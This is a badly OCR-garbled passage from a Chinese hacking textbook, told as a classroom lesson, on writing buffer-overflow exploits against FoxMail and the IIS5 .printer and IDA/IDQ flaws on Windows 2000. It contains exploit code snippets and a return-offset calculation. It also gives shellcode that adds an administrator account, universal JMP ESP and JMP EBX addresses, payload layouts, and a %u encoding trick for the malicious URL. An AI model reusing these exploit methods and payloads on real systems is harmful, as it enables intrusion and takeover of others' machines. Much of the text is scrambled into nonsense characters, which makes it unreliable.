' 倒 ~~~ "老病 当 即 旱 倒 。 


Е ан 1; s J — _ 


小 知识 : 不 同 出 错 处 理 的 外 在 表现 

1. 弹 出 “只 有 一 个 人 确定 按钮 的 红 叉 框 ”， 意 味 着 外 层 有 “try/except 块 决定 处 理 异 常 ， 而 内 层 

有 "try/finally” 块 。 当 按 下 确定 后 ， 是 在 “try/finally” 中 执行 。 

2. 漳 出 “有 调试 、 天 闭 按钮 的 非 红 叉 框 ?， 意 味 看 设置 了 “Just-In-Time Debugging”， 并 获得 机 会 
执行 ， 这 已 经 是 最 后 机 会 了 。 

3. 弹 出 “只 有 一 个 关闭 按钮 的 非 红 叉 框 ”， 意 味 着 没有 设置 “Just-In-Time Debugging’, AE this 
有 决定 处 理 异常 的 “try/except" 块 。 

4. 触 发 异常 ， 但 什么 框 也 未 弹出 ， 意 味 着 内 层 有 “try/except 块 决定 义理 异常 。 或 者 在 异常 处 
理 过 程 中 再 次 触发 异常 。 

宇 强 仔细 看 后 ， 说 道 :“ 那 ... 是 不 是 前 一 个 提示 的 是 内 存 不 能 read OG) 而 出 错 ; 而 后 一 个 提 
示 的 是 内 存 不 能 write CER) 而 出 错 ?” 


“对 | 就 是 这 里 啦 1 ”老病 高 闪 的 说 。“ 是 这 样 的 ， 我 们 履 蔓 了 0x150 个 A， 可 能 不 仅 和 覆盖 过 
EIP 的 地 方 ， 而 且 还 履 盖 了 其 他 一 些 程序 要 用 的 参量 ， 如 果 在 程序 返回 前 ， sine 
， 但 参量 的 地 址 被 改 成 41414141， 是 根本 不 能 写 的 ， 所 以 就 造成 了 写 (write) 类 型 错 
l” 


же ЧП 


“ 哦 ， 原 来 是 这 样 ， 那 怎么 办 呢 ?” 宇 强 发 现 那 位 PLMM 在 自己 发 言 时 朝 这 边 看 了 一 眼 ， 心 中 紧 
f— TF, $435 ug УВЕ ! 


老 羡 可 不 会 注意 这 些 ， 回 答 道 "$4 From? FREN- ла, ZeEfbkBHeHR, [BE 


覆盖 到 那些 参量 地 址 。 пэндер 分 法 : BüZEBUOXx1507K К, mAUREMOx75, 1 %0х75Ж 
ju, "BE 25) [ДШ ER, MAAKA, UEXOxT115BSKX E, ШШ ЖЕ. " 


h рь : ФП еп 110х104, ПЛЕН, f ! 如 图 1-24。 


memset (buffer, 0х41, 0х104); 
sprintf (temp, "From: %s\r\n", buffer); 
send (sock, temp, strlen (temp), 0); 
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"B ! 和 原来 那个 是 一 样 的 错误 ， 都 是 Read 错 误 ! "同学 们 叫 了 起 来 。 


老病 笑 道 : “哈哈 ， 对 虐 说 明 我 们 填充 'From:' 字 段 时 不 能 超过 0x104 的 长 度 。 解 决 了 这 个 问 
题 ， 我 们 继续 ， 想 办 法 定位 返回 点 的 位 置 。” 


“大 家 想 想 ， 上 节 课 的 返回 点 我 们 是 怎么 确定 的 呢 ? "老病 提示 大 家 。 
“ 嗯 .….... 是 根据 报错 信息 前 接 数 出 来 的 。” 古 风 说 性 。 


“对 ， 这 里 我 们 也 仿照 那样 ， 但 这 里 的 绥 冲 区 太 长 了 ， 我 们 把 数 的 方法 改进 一 下 。" 老 师 大 笔 一 
4% 


“我 们 改变 FoxMail1.c， 把 ‘From:' 字 段 的 填充 方法 改 一 下 。 改 变 的 程序 为 FoxMail2.c。” 


“我 们 把 FoxMail1.c 填 充 'From:' 字 段 的 那 段 替换 为 如 下 。” 


for(i=0; i<=0x104; i++) 

buffer[i] = 'A' + i % 10; 
sprintf (temp, "From: %s\r\n", buffer); 
send (sock, temp, strlen (temp), 0); 


“我 们 进入 邮箱 ， 把 原来 的 信和 删除 ; 再 执行 FoxMail2.c， 给 邮箱 发 封 新 信 。 这 次 用 FoxMail 接 收 
时 出 现 的 报错 框 成 了 ‘Access violation at address 44494847,Read of address 4А494847', 
如 1-25Hf 7n. ” 


Information 





"OK, Rez FARADH, ZGESURIROX4A49484779 zm fox[n E, Bift£FoxMaill3.crhig 
buffer[i] = 'A' + i % 10 的 取 余 数 改 为 整除 。” 


Ғог(1=0; i<=0x104; i++) 
buffer[i] = 'A' + i / 10; 
sprintf (temp, "From: %s\r\n", buffer); 


“再 次 删除 信件 ， 执 行 FoxMail3.c。 用 FoxMail 接 收 ， 这 次 出 现 的 错误 框 成 了 'Access violation 
at address 5A5A5A5A,Read of address 5A5A5A5A':, #HE1-26, " 


Information 





“从 上 面 的 两 个 提示 中 ， 我 们 就 可 得 到 精确 的 返回 地 址 位 置 了 1 "老病 得 意 的 说 。 
大 家 都 丈 二 和 尚 摸 不 着 头 脑 : “怎么 得 到 呢 ? ” 
“不 要 急 ， 我 们 一 起 来 推算 一 下 。 分 析 一 下 上 面 两 次 我 们 做 的 事情 。” 


“第 一 次 用 FoxMail2.c， 是 在 'From:' 字 段 不 停 的 加 上 A~J 的 循环 (就 是 十 六 进 制 0xX41~0x4A 这 
十 个 数 的 循环 ) 。” 


“вв У В ЕохМаіз.с, 21410595 КЕ, 92477] 50х41. 0х42...... жїн From: " 


“注意 了 ， 第 一 次 演出 时 报错 的 最 小 值 是 0xX47， 此 时 只 有 0x41~0x4A 在 不 断 循环 ， 所 以 我 们 可 
大 胆 推出 尾数 是 0x47 一 0x41 二 6。” 


“在 第 二 次 浴 出 时 报错 的 全 部 是 0x5A， 而 此 时 是 从 0x41 开 始 ， 每 10 个 数 为 一 段 。 所 以 0x5A 一 
0x41 王 0x19， 就 是 十 进 制 的 25， 即 在 字符 串 的 第 25 个 段 。” 


“所 以 我 们 可 大 胆 计算 出 程序 的 返回 点 位 置 是 : (0x5A 一 0x41) х10+ (0x47—0x41) = 
25x10+6=256 " 


“IË | 这 样 啊 | "大 家 一 片 欢呼 | 


哈哈， 我们 验证 一 下 猜测 结果 吧 ! 再 改 一 下 程序 ， 指 定 'From: 字段 第 256 开 始 的 四 个 字 闻 
是 'BBBB'， 而 其 他 全 部 为 A。” 


memset(buffer, 'A', 0x104); 
; 


buffer[256] = 'B' 
buffer[257] = 'B' 
buffer[258] = 'B' 
buffer[259] = 'B' 


“代码 如 上 修改 后 ， 如 果 猜 测 正确 ， 大 家 想 想 ， 会 是 什么 样 呢 ? "老病 问 道 。 
“ 吧 ， 应 该 是 'BBBB' 黎 天 到 了 退回 地 址 吧 ! ” 


“我 们 一 起 试 试 吧 ! 执行 这 个 程序 (FoxMail4.c) ， 果 然 弹 出 的 对 话 框 成 了 ‘Access violation at 
address 42424242,Read of address 42424242’”， 如 图 1-27。” 


Information 











“42 融 是 ' 虽 ' 的 ASCII 码 表示 ! ” 


“Е | So Cool ! "= Fee f — P š pa ! 


谢谢， 谢谢 大 家 的 鼓励 ， 我 能 取得 现在 这 个 成 绩 ， 是 离 不 开 大 家 的 文 持 ， 谢 谢 你 们 ， 我 爱 你 
1! 


ТЭ... Ж 


“ШШ, ЕТЕН я aE u BJ RETTORE, MAARE ENER aR, ои =н 
这 种 方法 来 进行 定位 。 "老病 强 调 到 。 


“六 好 了 ， 真 是 个 好 方法 啊 ! 这 样 别人 给 出 漏洞 证 实 程 序 ， 我 们 可 以 很 快 定位 了 1 " 教 宇 里 顿时 
议论 公 纷 纷 。 


“ 虽 ，OK， 回 到 我 们 这 个 程序 的 利用 上 来 吧 ! ” 


1.7.3 ShellCode 的 使 用 


“让 我 们 再 看 看 第 二 个 条 件 一 一 ShellCode。ShellCode 很 重要 ， 但 这 里 我 不 详细 介绍 ， 
ShellCode 的 编写 很 有 考究 的 ， 会 涉及 到 各 方面 。 应 用 不 同 ， 要 求 不 同 ， 编 守 也 不 同 。 如 果 同 
学 们 有 兴趣 ， 我 会 抽 个 时 间 讲 ShellCode' 的 编写 。” 


“有 有 有 ， 当 然 有 兴趣 啦 | " 听 老 病 一 说 ， 大 家 都 和 争先恐后 的 表示 想 听 。 


“呵呵 ， 那 好 吧 ， 我 们 在 以 后 的 课程 中 涉及 。 这 次 我 就 直接 给 出 在 中 文 Win2000 SP2 下 添加 名 
为 "w' 用 户 的 ShellCode。 以 后 大 家 会 写 ShellCode 时 ， 直 接替 换 掉 就 可 以 了 。" 


char ShellCode[] = 
"\х8В\хЕ5Б\х55\х8В\хЕС\хЗЗ\хЕЕ\х57\х57\х57\х57\хС7\х45\хЕ1\хб6Е\х65" 
"NXTANX20NXC7NXABNXFBNX75NX73NX65NX72NXC7NXABNXF9NX20NX77NX20NX2E" 
"NX80NXABNXFCNXO1NXCOGNXABNXFDNX61NXCOGNXA45NXFENX64NX33NXCONX88NX45" 
"NAXFFNX8DNXA45NXF1NX5BONXB8NXAANXOBNXO1NX78NXFFNXDO" ; 


1.7.4 通用 的 JMP ESP 地 址 


“最 后 是 第 三 个 条 件 一 一 JMP ESP 地 址 。 这 个 上 次 给 大 家 讲 了， 并 给 出 了 中 文 Win2000 各 版 本 
相应 的 地 址 ， 大 家 直接 使 用 即 可 。 但 各 个 版 本 不 统一 ， 使 用 起 来 相当 麻烦 。 这 里 ， 我 再 给 大 
家 一 个 大 餐 一 一 中 文 版 Win2000、XP、Win2003 的 JMP ESP 通 用 跳 转 地 址 (lion 给 出 的 
Ox7ffa4512) 。 经 我 测试 ， 绝 对 可 用 ， 董 碰 无 其 1 是 编写 洽 出 利用 程序 的 必 备 民 药 1 让 我 们 一 
起 感谢 lion 的 无 私 共享 精神 吧 ! 这 才 是 真正 的 Hacker 精 神 ， 大 家 一 定 要 发 扬 啊 1” 


大 家 听 后 拼命 的 点 头 : “好 也 ! ” 
“好 吧 ， 这 下 我 们 的 三 个 条 件 都 有 了 ， 我 们 来 完成 统一 吧 ! ” 


“初步 分 析 后 ， 我 们 知道 'From:'* 字 段 作 如 下 构造 束 可 跳 入 我 们 的 ShellCode。 如 果 还 有 不 清楚 
的 同学 ， 请 再 复习 一 下 上 节 课 的 内 容 。 如 图 1-28。” 





256 人 小 有 0x7ffa4512 SSSSSSS 


"bb 就 这 样 哮 1 


JEE, ARIDE 1 "老病 突然 一 喝 1“ 这 样 和 最 开始 我 们 覆盖 0x150 个 入 测试 时 是 类 似 的 ， 
ShellCode 会 把 程序 要 写 的 参量 履 盖 了 ， 那 程序 在 返回 之 前 ， 会 产生 那个 write 型 错误 1” 


住 了 呼吸 ， 一 是 想 仔 细 听 听 这 清脆 的 声音 ， 二 是 等 待 看 老病 的 回答 。 


“在 这 种 情况 下 ， 一 般 有 三 种 解决 方法 "， 老 病人 耐心 的 解释 道 。 "SB— Bh, IEEE usu 
的 地 址 ， 即 保证 参量 是 可 写 的 ， 不 让 它 出 现 Write 错 误 ， 但 这 种 方法 很 麻烦 ， 需 要 知道 不 能 写 
的 参量 的 所 有 位 置 ; 第 二 种 ， 窗 盖 异 剃 ， 这 种 方法 会 在 后 面 讲 到 ; 第 三 种 ， 就 是 这 里 我 们 使 
用 的 ， 把 ShellCode 放 在 前 面 ! RATERS, ” 


“ 哦 ?把 ShellCode 放 在 前 面 是 什么 意思 ?” 宇 强 见 PLMM 不 太 懂 ， 也 忙 着 问 老 炳 。 


“就 是 说 ， 我 们 把 ShellCode 放 在 RET 前 的 缓冲 区 中 ， 而 在 RET 后 面 放 入 很 短 的 一 个 指 合 ， 指 
爸 的 内 容 就 是 往 前 跳 ， 跳 到 前 面 的 ShellCode 中 。” 


“形象 的 说 ， 融 是 这 样 的 格式 ， 根 本 不 去 上 覆 兰 不 能 改变 的 参量 ， 如 图 1-29。” 


= 


ShellCode КЕТ ХЕК 不 能 改 的 参 


ш! 


550525 Üx7fa4512 ЈМР -0x80 
| 





“在 这 样 的 格式 下 ， 返 回 时 程序 就 会 先 执行 JMP —0x80 这 个 指令 ， 往 前 跳 到 一 堆 空 指令 中 ， 然 
后 顺 着 空 指 今 往 下 执行 ， 最 后 进入 到 ShellCode 中 ， 就 可 执行 我 们 的 ShellCode 了 。” 


' 哦 1 这 样 啊 ! 太 有 创意 了 ! "大 家 感叹 道 。 


“这 是 很 基本 的 方法 ， 更 多 精彩 还 在 后 面 呢 ! "老病 回答 说 , “好 ， 这 里 不 罗 味 了 ， 让 我 们 按照 
这 个 格式 ， 给 漏洞 以 最 后 一 击 ， 写 出 最 终 的 利用 程序 一 一 Exploit 1 ” 


[ 参看 光盘 中 的 程序 FoxMail5.c ] 


“我 们 先 把 邮箱 清空 ， 编 译 FoxMail5.c 并 执行 ， 再 用 FoxMail 接 收 邮 件 。 只 要 一 接收 ， 残 会 在 本 
机 上 添加 一 个 名 为 "w' 的 管理 员 用 户 了 ， 大 家 看 图 1-30。” 








CWINNT\System32\cmd.exe 


IC» ПЕТУ Рта 1985-2000 Microsoft Corp- 
CG: “ynet TET y 
SSSCU-Eñ6FHZSSU9Q 的 用 户 帐 户 


Administrator 1058 5С0—-ЕАБЕНА55090 
ТОЯМ SCU—ER6FHZSSUS9Q Het&5howSeruices Tslnte=rneti|==m 


IC: S>net исе 


INNSCU-ER6FHZSSU9Q 的 用 户 帐 户 


Administrator Guest IUSR SGU-ERGFHZS5U9Q 
ТАМ SCU-ERG6FHZSSU9Q MetShowServices 
UU SR SCU—ERG6FHZSSU9Q T 


| - ' an tg RU L^ = RU " 
I Hi] “i ai + rim Np M 


TasInternetUser 


“t l RIT !” 


“大 家 也 注意 到 了 吧 ， 通 过 我 们 的 实际 编写 ， 发 现 只 要 用 户 用 FoxMail 一 收 邮 件 ， 融 会 马上 触 
发 。 而 不 是 像 有 些 厂 丙 传 闻 的 那样 只 在 用 户 回 复 该 邮件 时 才 被 触发 。 所 以 国内 外 软件 开发 公 
司 对 待 漏洞 发 现 者 的 态度 、 漏 洞 本 身 的 态度 、 对 产品 使 用 用 户 公布 漏洞 信息 的 态度 ......”" 老 病 
XC UR T o 


т 三 两 还 居然 说 是 漏洞 发 现 者 的 炒作 ， 这 简直 太 不 负责 任 了 上 明明 有 问题 ， 还 不 敢 承 
"同学 们 一 个 个 义愤 填 麻 ! 


“ 算 了 ， 我 们 这 里 只 讨论 技术 ， MN 了 。" 老 病 又 恢复 了 原来 的 生气 , “这 里 再 
和 大 家 一 起 总 结 下 对 FoxMail 的 利用 过 程 吧 ! ' 


“第 一 步 、 精 确定 位 返回 点 。 我 们 用 求 余 取 整 法 可 巧妙 得 到 返回 位 置 。， 


т 


“第 二 步 、ShellCode 编 写 。 我 们 直接 用 别人 写 好 的 ShellCode。” 
“第 三 步 、JMP ESP 的 地 址 。 我 们 使 用 Lion 共 享 的 中 文通 用 地 址 一 一 0x7ffa4512。 


最 后 把 它们 合 起 来 ， 由 于 返回 点 后 面 不 远 处 不 能 履 盖 ， 所 以 我 们 把 组 合 位 置 作 稍稍 改变 ， 把 
ShellCode 放 前 面 ，RET 后 面 放 一 个 往 前 跳 的 指令 ， 用 这 样 的 方式 跳 到 我 们 的 ShellCode 中 。 


A: — Pe En 这 样 就 完成 了 我 们 首 个 缓冲 区 漏洞 的 利用 编写 了 ， 是 


“ 太 有 成 就 感 了 1 "同学 们 喷 道 。 


“шш, ЖИ, ЕТ 有 了 兴趣 融会 更 有 动力 钻研 下 去 ， 钻 研 也 是 真正 
的 黑客 精 伸 的 一 部 分 。 大 家 休 忌 一 下 ， 然 后 我 们 下 继续 。” 


1.8 牛刀 小 试 一 一 Printer 洽 出 漏洞 编写 


课 间 十 分 钟 ， 大 家 和 老病 随便 的 聊 了 起 来 。 

"EE 【我 们 这 里 有 几 位 女 黑客 啊 ! 难得 啊 ! ”老病 说 。 

全 班 同 学 都 笑 了 起 来 。 

“ 几 位 女 黑 客 介 绍 一 下 自己 啊 1 让 大 家 认识 一 下 。” 老 病 边 喝 水 边 说 。 
“ 虽 ， 我 叫 小 亮 。” 我 叫 小 红 。" 几 位 女生 依次 介绍 自己 。 

宇 强 仔细 的 听 着 ， 到 那 位 PLMM 时 更 是 聚精会神 。 

“我 叫 呈 小 倩 。”PLMM 清 晰 的 说 道 。 


“多 好 听 的 声音 啊 | 宇 强 上 暗暗 想到 ，*“ 而 且 ， 小 倩 .…. 吧 ? 《倩女 幽魂 》 中 王 祖 唆 扮 演 的 就 是 小 全 
Dr | 


宇 强 想起 了 《倩女 幽魂 》 中 的 诗 一 一 “十 里 平湖 钉 满 天 ， 寸 寸 青 丝 悉 华 年 。 对 月 影 单 望 相 护 ， 
RIK SESS ” 


“什么 啊 ，《 倩 女 幽 瑰 》 讲 的 是 鬼魂 啊 ， 目 己 想 到 哪儿 去 了 。 "于 强 暗暗 加 了 目 己 一 句 。 
老病 在 台 上 继续 说 :“ 几 位 女 同 学 要 努力 啊 1 以 后 成 为 像 wollf 一 样 的 中 国 女 黑客 啊 ! ” 
大 家 都 笑 了 起 来 ， 几 位 女 同学 也 报 着 跨 乐 了 。 

“好 ， 我 们 趁 热 打铁 ， 利 用 刚才 的 步骤 迅速 完成 对 llS5.0 Printer 漏 洞 的 利用 编写 吧 1” 


1.8.1 漏洞 背景 


“IS 的 Printer 漏 洞 只 对 Win2000SP0、SP1 版 本 有 效 ， 可 以 说 是 个 元 老 级 的 漏洞 了 ， 现 在 基本 
上 都 没有 了 ， 大 家 用 它 来 练 练 手 吧 1” 


小 知识 : 15 (Internet Infomation Server) : Internet 信 息 服 务 。 它 是 一 种 Web 服 务 ， 主 要 包 
括 WWW 服 务 器 、FTP 服 务 器 等 。 它 使 得 在 Intranet (局 域 网 ) 或 Internet (因特网 ) 上 发 布 信 
RARE A. 


“微软 Win2K 1IS5 的 打印 ISAPI 扩 展 接 口 建 立 了 .printer 扩 展 名 到 msw3prt.dll 的 映射 关系 ， 缺 省 
情况 下 该 映射 存在 。 当 远程 用 户 提交 对 .printer 的 URL 请 求 时 ，1IS5 调 用 msw3prt.dll 解 释 该 请 
求 。 由 于 msw3prt.dll 缺 乏 足 够 的 缓冲 区 边界 检查 ， 远 程 用 户 可 提交 一 个 精心 构造 的 针 

对 .printer 的 URL 请 求 ， 这 样 ， 就 会 在 msw3prt.dll 中 发 生 典 型 的 缓冲 区 洽 出 ， 潜 在 允许 执行 任 
意 代 码 。" 老 病 简 单 的 介绍 了 漏洞 的 背景 和 原因 。 


1.8.2 构造 利用 


“我 们 看 看 如 何 利 用 它 吧 ! 还 是 三 大 步骤 。” 
“第 一 步 、 确 定 返回 点 的 位 置 。 这 里 我 们 查看 相关 的 漏洞 公告 和 分 析 公 告 ， 可 以 知道 ， 对 http:/ 
域 填 元 到 268 个 字 节 时 融 可 以 复 兰 到 EIP。” 


“第 二 步 、ShellCode。 我 们 还 是 使 用 现成 的 ShellCode 吧 ! 给 SP0 的 机 器 添加 一 个 用 户 。” 
“第 三 步 、JMP ESP 的 地 址 。 还 用 说 吗 ?Lion 大 是 的 地 址 是 通 吃 的 。” 


“好 了 ， 把 它们 组 合 起 来 ， 格 式 如 图 1-31。” 


http:// 空 指令 КЕТ 


-------------| ------| |-------------| 


26870x90 ”orfadill SSSSSSS 


printer? 





“然后 轻松 把 他 们 合成 程序 Printerc， 我 们 把 写 好 的 程序 编译 、 执 行 ! 再 看 远程 机 器 的 效果 
ng l” 

"Yeah ! 成 功 添 加 了 一 个 用 户 !1”“ 太 好 了 1 "又 是 一 阵 欢 呼 ， 宇 强 简 直 不 敢 相 信 ,“ 太 容易 了 

吧 1” 

“了 呵呵 ， 讲 解 这 个 漏洞 一 方面 是 让 大 家 再 邵 炙 一 下 渝 出 编写 的 基本 思路 ， 但 更 关键 是 ， 我 要 通 
过 这 个 漏洞 讲解 缓冲 区 浴 出 利用 的 另 一 种 形式 一 一 更 音 用 的 形式 ， 大 家 和 干 万 别 松 气 哦 I” 


1.10 拾 阶 而 上 一 一 IDA/IDQ 洽 出 漏洞 编写 

“好 了 了， 诸位， 经 过 刚才 的 讲解 ， 大 家 清楚 了 JMP ESP 和 JMP/CALL EBX 两 种 方式 的 利用 和 区 
别 吧 ^" 

“ 吧 ， 好 想 再 来 一 次 JMP/CALL EBX 的 实战 啊 "大 家 都 感叹 道 ， 连 玉 波 都 不 觉得 饿 了 。 


“好 | 大 家 有 兴趣 融 好 ! 兴趣 是 最 好 的 老病 1 既然 大 家 很 想 ， 那 我 们 再 来 一 次 实战 ， 巩 固 一 下 
知识 吧 l” 


“好 呆 1" 


“这 次 我 们 就 对 1S 的 IDA/IDQ 漏 洞 进行 利用 编写 吧 ! ” 


1.10.4 漏洞 公告 


“站 先 ， 我 们 来 看 看 漏洞 公告 ， 如 图 1-42。” 


动 I15 的 inder server афа idq ISAPIT RE ir riw Fe ff idum ШН - Microsoft Internet Explorer 
AME SE ЖЕ) ЧА) ТАХТ) ЖЇН) 
„же. +- OOA Dr uemx gus ga Ə КУ- = & а 
HABEO) | | Http: on focus net! vuls/200106/1099.htril | 十 转 到 me 
- Microsoft Windows zü00 J"rofessionen 5422 也 | 
- Microsofi Windows 2000 Professional SP T 
- Microsof? Windows 2000 Professional 
- Microsof Windows 2000 Datacenter Server S77 


- Microsoft Windows 2000 Datacenter Server SPI 
- Microsoft Windows 2000 Latacenter Server | 








= Microsoft Windows 2000 Advanced Server SIP2 
- Microsofi Windows 2000 Advanced Server SP] 
- Microsoft Windows 2000 Advanced Server 


rA 
«IIS 4.0/5. 0 Index Server and Indexing Service ISAFI Extension Buffer Üwverflow *> 


keyword: ISAPI Extension Buffer Overflow» 


WEATEINDER SERVERN LIDMATE HER Bus » duit eir EEd-Rhnternetii _ 
ERAH. ЧАРЕ Е id MENNE. ido 趟 过 者 是 使 用 idq. 0138841888, 


THATE ФшШШ › APAE F і ад. DIE BARRE. ЕВУ РЕВО А SSmi ЙДЕ, 
可 以 导 辫 远程 职 击 者 利用 着 出 菠 得 sYSTEW 要 刊 来 访问 远程 系统 。 

Мы 

ОРАТИ a B] ШЕЕ ЗЕТРИШ+Е =: 

GET /HULL ida?[buffer]-X НТТР/1. 1 


Host: werd 
[buffer] ALE bytes. 


a ыб 
小 知识 : IIS 的 IDA/IDQ 漏 洞 


dil 


作为 安装 IIS 过 程 的 一 部 分 ， 和 有 系统 还 会 安装 几 个 ISAPI 扩 展 .dll， 其 中 ，idq.dll 是 Index Server 
一 个 组 件 ， 对 管理 员 脚 本 和 Internet 数 据 查 询 提 供 支 持 。 但 是 ，idq.dll 在 一 段 处 理 URL 输 入 的 
代码 中 存在 一 个 未 经 检查 的 缓冲 区 ， 攻 击 者 利用 此 漏洞 能 导致 受 影响 的 服务 器 产生 缓冲 区 浴 
出 ， 从 而 执行 目 己 提供 的 代码 。 更 为 严重 的 是 ，idq.dll 是 以 System 刁 份 运行 的 ， 攻 击 者 可 以 
利用 此 漏洞 取得 系统 管理 员 权 限 。 


“该 漏洞 对 Win2000 SP0、SP1、SP2 有 效 。 大 家 可 以 看 到 ， 采 用 GET /NULL.ida?[bufer]-x 
HTTP /1.1 对 Buffeer (缓冲 区 ) 域 进行 填充 ， 丈 可 以 履 盖 到 EIP， 再 继续 也 可 以 覆盖 到 异常 处 
理 点 。 ” 


1.10.2 初步 利用 
“我 们 温 故 而 知 新 ， 还 是 按照 三 个 步骤 来 进行 。” 


“第 一 、 寞 剃 点 位 置 。 通 过 漏洞 分 析 可 以 知道 ， 异 常 处 理 点 在 Buffer (缓冲 区 ) 5240F ў ж, 
所 以 我 们 在 236 字 节 放 上 NOP NOP jmp 04 , 1£2407£ ў | BN.EJMP EBXBJH HE, #244= 3 
放 上 我 们 的 ShellCode。” 


“第 二 、ShellCode。 这 里 我 也 不 说 了 ， 还 是 添加 用 户 。” 

“第 三 、Jmp EBX 的 地 址 一 一 0x7FFA1571。” 

好 ， 我 们 的 三 步 曲 都 有 了 ， 来 构造 吧 ! 构造 形式 如 图 1-43。” 
МОР 236 240 


u. j| — |ssssssssss| 
232 个 NOP Jmp04  Ox7FFA1571 ShellCode 


"Hk, Yeah ! ， 我 们 把 构造 好 的 程序 运行 吧 1 "大 家 都 迫不及待 了 。“ 好 1 运行 1 ”手忙脚乱 的 把 
程序 编译 并 运行 开 来 。 


“呵呵 1 "老病 看 到 大 家 忙 完 后 二 说道 ，“ 这 个 lS 漏洞 和 前 面 讲 的 那些 漏洞 有 些 不 一 样 一 一 它 要 
对 URL 进 行 一 定 的 编码 转换 ， 这 样 转换 后 ， 我 们 的 JMP 04, JMP EBX 的 地 址 和 ShellCode 都 
被 改变 啦 【 当然 束 不 能 执行 我 们 想 要 的 ShellCode 了 。” 


W?” 


“这 就 是 该 漏洞 不 同 的 地 方 ， 也 给 大 家 带 来 了 些 挑 战 性 ， 但 在 实际 中 ， 这 种 事 还 是 很 常见 的 。 
比如 Cmail 会 把 大 写 改 成 小 写 等 。” 


“ 哦 ， 那 怎么 解决 呢 ? "大 家 问 道 ,，“ 这 方面 不 解决 ， 那 很 多 漏洞 都 不 能 用 了 。” 


“对 1 我们 一 定 要 解决 。 但 解 铃 还 需 系 铃 人 ， 首 先 要 看 看 IDA 是 如 何 变 换 那 些 URL 请 求 字符 
的 1” 


1.10.3 ZEF 

“对 IDA/IDQ 漏 洞 提 交 的 URL 被 改变 ， 是 因为 发 送 的 内 容 由 单字 节 转 换 成 了 宽 字 符 。” 

小 知识 : 单字 节 、 多 字 节 和 宽 字 和 节 
一 直 


节 
在 多 年 表 ， 许 多 人 一 下 将 文本 串 作为 一 系列 单字 节 字 符 来 进行 编码 ， 并 在 结尾 处 放 上 一 个 
需 。 但 单字 节 只 能 有 256 种 编码 ， 根 本 不 够 表示 世界 各 国 的 文字 。 这 样 ， 束 出 现 了 多 字 节 编 


在 多 字 节 编码 中 ， 字 符 有 单字 节 和 双 字 节 。 在 双 字 节 字 符 中 ， 第 一 个 字 节 或 "前 导 字 节 "发 出 信 
号 ， 表 示 它 和 下 一 个 字 节 将 被 解释 为 一 个 字符 。 因 为 字 节 编码 既 有 单字 节 又 有 双 字 节 ， 这 样 
就 比较 麻烦 。 


“ 宽 字 符 ?" 是 双 字 节 、 多 语言 字符 代码 。 每 个 字符 都 用 固定 的 16 位 大 小 表示 ， 因 此 使 用 宽 字 符 
可 以 简化 国际 字符 集 的 编程 。 特 别 的 ，Unicode 就 是 一 种 宽 字 符 编 码 的 国际 标志 ， 它 用 一 个 16 
位 的 值 来 表示 每 个 字符 。 


“所 以 ， 在 最 开始 的 时 候 ，eEye 的 办 法 是 在 ShellCode 前 面 放 上 很 多 NOP， 这 样 束 把 
ShellCode 推 向 了 0x004x00xx 的 地 址 ， 就 可 以 用 xx4x 这 样 的 串 来 覆盖 ret， 这 个 串 被 扩展 为 
xx004x00 以 后 ， 正 好 跳 转 到 ShellCode 的 位 置 。” 


“ 哇 ， 办 法 很 巧妙 哈 | "大 家 《说 道 。 


“ 嗯 ， 这 种 方法 虽然 理论 上 行 得 通 ， 但 实际 上 问题 非常 多 ， 可 以 控制 跳 转 却 无 法 执行 代码 ， 而 
且 不 同 的 机 器 这 个 0x004x00xx 都 不 一 样 ， 这 样 束 很 难 做 出 通用 性 比较 好 的 Exploit。” 


“ 哦 ， 那 怎么 办 呢 ?” 


“ 随 着 拉 术 的 发 展 ， 有 人 发 现 可 用 巧妙 的 方法 来 吉 开 个 扩 展 成 宽 宇 繁 ， 这 样 我 们 就 可 轻松 的 改 
写 很 完善 的 Exploit 了 1” 


“ 哦 ! 黑客 精 利 真是 好 啊 ! 很 多 困难 的 问题 大 家 《一 起 解决 、 一 起 进步 。 "大 家 《由 囊 的 说 道 , “用 
的 是 什么 方法 呢 ? " 


“方法 就 是 : 在 我 们 要 用 的 JMP 04. JMP EBX 地 址 和 ShellCode 前 面 加 一 个 '%Ww' 符 号 ，1IS 是 这 
样 处 理 '"%u' 的， 它 认 为 是 宽 字 符 ， 束 不 再 作 变 换 了 。 比 如 ，JMP 04 的 指 作 写成 %u04eb 。 我 
们 把 ShellCode 都 加 上 '‘%uw"， 束 不 会 改变 我 们 的 东西 了 。” 


"Hx ! 这 样 啊 ! 真是 一 语 点 破 天 机 啊 ! " 台 下 感叹 道 。 
呵呵， 这 融 是 黑客 魅力 的 所 在 。 好 了 ， 我 们 融 用 这 个 办 法 把 这 个 Exploit 完 成 吧 ! " 
“Hf 1” 


Кэ — 1 |512, — 5 %ЅһеіСоде% Еи, 


“BE 1 添加 完成 了 。 "同学 们 探 探 汗 。 
“好 1 我们 运行 斌 试 吧 | "老病 一 编译 、 执 行 ， 哈 ， 一 个 用 户 融 添 加 上 了 。 
“ 哦 1” 教 宇 里 欢呼 了 起 来 ，“ 成 功 罗 1 成功 罗 1” 


“了 呵呵， 有 菜鸟 还 是 有 菜 乌 的 乐趣 吧 ! 尤其 是 经 过 种 种 挫折 后 的 成 功 ， 会 很 有 成 就 感 的 1 好 ， 今 
天 融 到 这 里 ， 下 周 这 个 时 候 我 们 再 继续 吧 !” 


Ж 6 А = 


О: 用 JMP ESP 地 址 履 关 时， 意思 是 要 跳 到 ESP 去 执行 ， 那 ESP 具 体 的 值 是 多 少 呢 ? 


А: 你 还 没有 理解 覆盖 的 意义 。 我 们 不 需要 知道 ESP 具 体 的 值 ， 只 需要 知道 JMP ESP 指 邻 的 地 
址 就 可 以 了 。 而 JMP ESP 指 邻 的 地 址 在 同 种 系统 甚至 是 不 同 种 系统 下 ， 都 有 相同 的 值 ， 即 
0x7FFA4512。 建 议 册 看 看 本 章节 ShellCode 的 定位 部 分 。 


О: 怎么 知道 JMP ESP 指 令 的 地 址 呢 ? 


A : JMP ESPiR DANa ЕЕЕ E4。 只 要 你 发 现 内 存 里 面 有 一 个 地 方 是 FF Е4, SB SERIE. 
用 此 地 方 的 地 址 了 。 上 比如 ， 你 查看 内 存 0x7FFA4512 的 地 方 ， 只 要 是 中 文 版 Windows， 一 定 放 
的 是 FF E4 指 命 ， 所 以 说 是 通用 地 址 。 


О: /& 4 NDBJMP ESP 指 邻 的 机 器 码 是 FF E4 呢 ? 


A: 即 可 以 用 查询 工具 得 到 ， 也 可 以 在 VC 中 用 “asmf}?" 财 入 汇编 JMP ESP， 再 按 F10 进 入 调 
